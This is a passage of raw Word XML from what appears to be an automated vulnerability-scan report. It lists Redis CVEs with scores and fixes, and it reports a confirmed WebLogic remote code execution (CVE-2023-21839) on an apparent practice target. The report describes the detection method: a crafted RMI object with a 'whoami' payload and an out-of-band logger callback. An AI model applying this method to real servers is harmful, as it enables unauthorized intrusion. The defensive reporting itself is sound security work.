          <w:p w14:paraId="57B89D06"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4834D8D1"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41D64A2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E6EA0C5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Risk level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="3E94FF"/>
          </w:tcPr>
          <w:p w14:paraId="651A6D0C"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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="5D4B0D3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54E70651" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DEA36F4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>3.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="586D3AC7"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3464036" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="591A138F"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5">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CVE-2023-45145</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="750D160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7174B85C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25D199FC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Redis is an in-memory database that persists on disk. On startup, Redis begins listening on a Unix socket </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>before adjusting its permissions to the user-provided configuration. If a permissive umask(2) is used, this creates a race condition that enables, during a short period of time, another process to establish an otherwise unauthorized connection. This problem has existed since Redis 2.6.0-RC1. This issue has been addressed in Redis versions 7.2.2, 7.0.14 and 6.2.14. Users are advised to upgrade. For users unable to upgrade, it is possible to work around the problem by disabling Unix sockets, starting Redis with a restrictive umask, or storing the Unix socket file in a protected directory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="3BB722E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12144286" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E48D8EF"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BC2450A"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3DEC879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6DF8405" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Risk level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="3E94FF"/>
          </w:tcPr>
          <w:p w14:paraId="27D8A988"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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="33D7821F"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61AAD1C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="386FCB50" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="4131EBA8"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6DA7B2BB" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5580971C"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6">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CVE-2022-24736</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="7095833A"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32A67BF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CDACA72" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Redis is an in-memory database that persists on disk. Prior to versions 6.2.7 and 7.0.0, an attacker attempting to load a specially crafted Lua script can cause NULL pointer dereference which will result with a crash of the redis-server process. The problem is fixed in Redis versions 7.0.0 and 6.2.7. An additional workaround to mitigate this problem without patching the redis-server executable, if Lua scripting is not being used, is to block access to `SCRIPT LOAD` and `EVAL` commands using ACL rules.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="4CFD70F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32D84607" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E033B0F"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31E458C7" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrayFirstColumn"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3120"/>
        <w:gridCol w:w="6240"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="0E00B55C"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202E8CFB" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Risk level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="3E94FF"/>
          </w:tcPr>
          <w:p w14:paraId="34E345FC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="36C01E64"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C3A319C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F8E076F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>1.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="39D3B82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35ABFEB" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B8148D4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:hyperlink r:id="rId207">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CVE-2022-3647</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="0EBECE23"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0A4D2A95" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D674B41" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>** DISPUTED ** A vulnerability, which was classified as problematic, was found in Redis up to 6.2.7/7.0.5. Affected is the function sigsegvHandler of the file debug.c of the component Crash Report. The manipulation leads to denial of service. The complexity of an attack is rather high. The exploitability is told to be difficult. The real existence of this vulnerability is still doubted at the moment. Upgrading to version 6.2.8 and 7.0.6 is able to address this issue. The patch is identified as 0bf90d944313919eb8e63d3588bf63a367f020a3. It is recommended to apply a patch to fix this issue. VDB-211962 is the identifier assigned to this vulnerability. NOTE: The vendor claims that this is not a DoS because it applies to the crash logging mechanism which is triggered after a crash has occurred.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="7AF7455B" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48F6E02B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4202A817" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B2CAD70" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:p w14:paraId="7C06ABC7" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F8E881" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Vulnerabilities found for Redis Key-Value Store 5.0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FC7667" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31572995" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>These vulnerabilities expose the affected applications to the risk of unauthorized access to confidential data and possibly to denial of service attacks. An attacker could search for an appropriate exploit (or create one) for any of these vulnerabilities and use it to attack the system.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E2FCA3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>The vulnerabilities are identified based on the server's version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A02EC4E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Only the first 30 vulnerabilities with the highest risk are shown for each port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D30462D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000FE06" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We recommend you to upgrade the affected software to the latest version in order to eliminate the risks imposed by these vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411DDF35"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183FC0B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3208C27B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1519C24D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="477D81FD" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60D1F869" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7233C79B" w14:textId="5212D1C9" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE-2020-21468, CVE-2021-32626, CVE-2022-24834, CVE-2022-24736,CVE-2021-21309, CVE-2015-8080, CVE-2021-32627, CVE-2023-25155, CVE-2023-45145, CVE-2022-36021, CVE-2021-41099, CVE-2021-31294, CVE-2021-3470, CVE-2022-24735, CVE-2021-32687,CVE-2021-32762, CVE-2021-32761, CVE-2021-32628, CVE-2023-28856, CVE-2021-32675, CVE-2022-3647, CVE-2021-32672, CVE-2020-14147</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34F0AA57" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC3A6DF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="989898"/>
        </w:rPr>
        <w:t>✘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE575A1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DE794F" w14:textId="314665D2" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.2.5 Oracle WebLogic - Remote Code Execution (CVE-2023-21839)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="1CD9BF66" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71E07AAD" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BCF3AC8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>pentest-ground.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="680EDA4E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21074B61" wp14:editId="2FE39258">
                  <wp:extent cx="1397000" cy="1397000"/>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75E373A4" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68907675" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="091D4E82" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
          <w:p w14:paraId="44598933" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Port: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="434343"/>
              </w:rPr>
              <w:t>7001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="39F1374E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31D83F48" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50008BCA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">We managed to detect this vulnerability using GIOP protocol in Oracle Server by sending a payload containing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Data received on handler </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>oracle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFFAE08" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC44717" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We found that the target server is vulnerable to CVE-2023-21839, a Remote Code Execution inside the Core component of Oracle WebLogic Server. The root cause of this vulnerability is an insecure deserialization via T3, IIOP protocol that could allow an unauthenticated attacker to take control of the server. The attacker can send a crafted JNDI/RMI malicious object in order to achieve access to the server. We have detected this vulnerability by sending a crafted RMI object to the server with whoami payload and fetching the server response that was sent to one of our loggers. We send the response to a logger because this is an Out-of-Band vulnerability, meaning that the output of the command is not reflected in the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE8238E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A8F580" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The risk exists that a remote unauthenticated attacker can fully compromise the server in order to steal confidential information, install ransomware, or pivot to the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADEED17" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053A7109" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We recommend upgrading the Oracle WebLogic to a version higher than 12.2.1.4.0 or 14.1.1.0.0 , which can be done from the administrator panel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0F2C7B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172A25BB" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId208">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CVE-2023-21839</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="46F62F81" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId209">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.oracle.com/security-alerts/cpujan2023.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D894705" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>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36B94262"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46767EE1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AEE6583" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="1F82D529" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C3483BD" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05AED736" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="13E7AC52" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7938559D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0139726F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE-2023-21839</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="39CA8EC5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD3FDC3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BAEA13" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
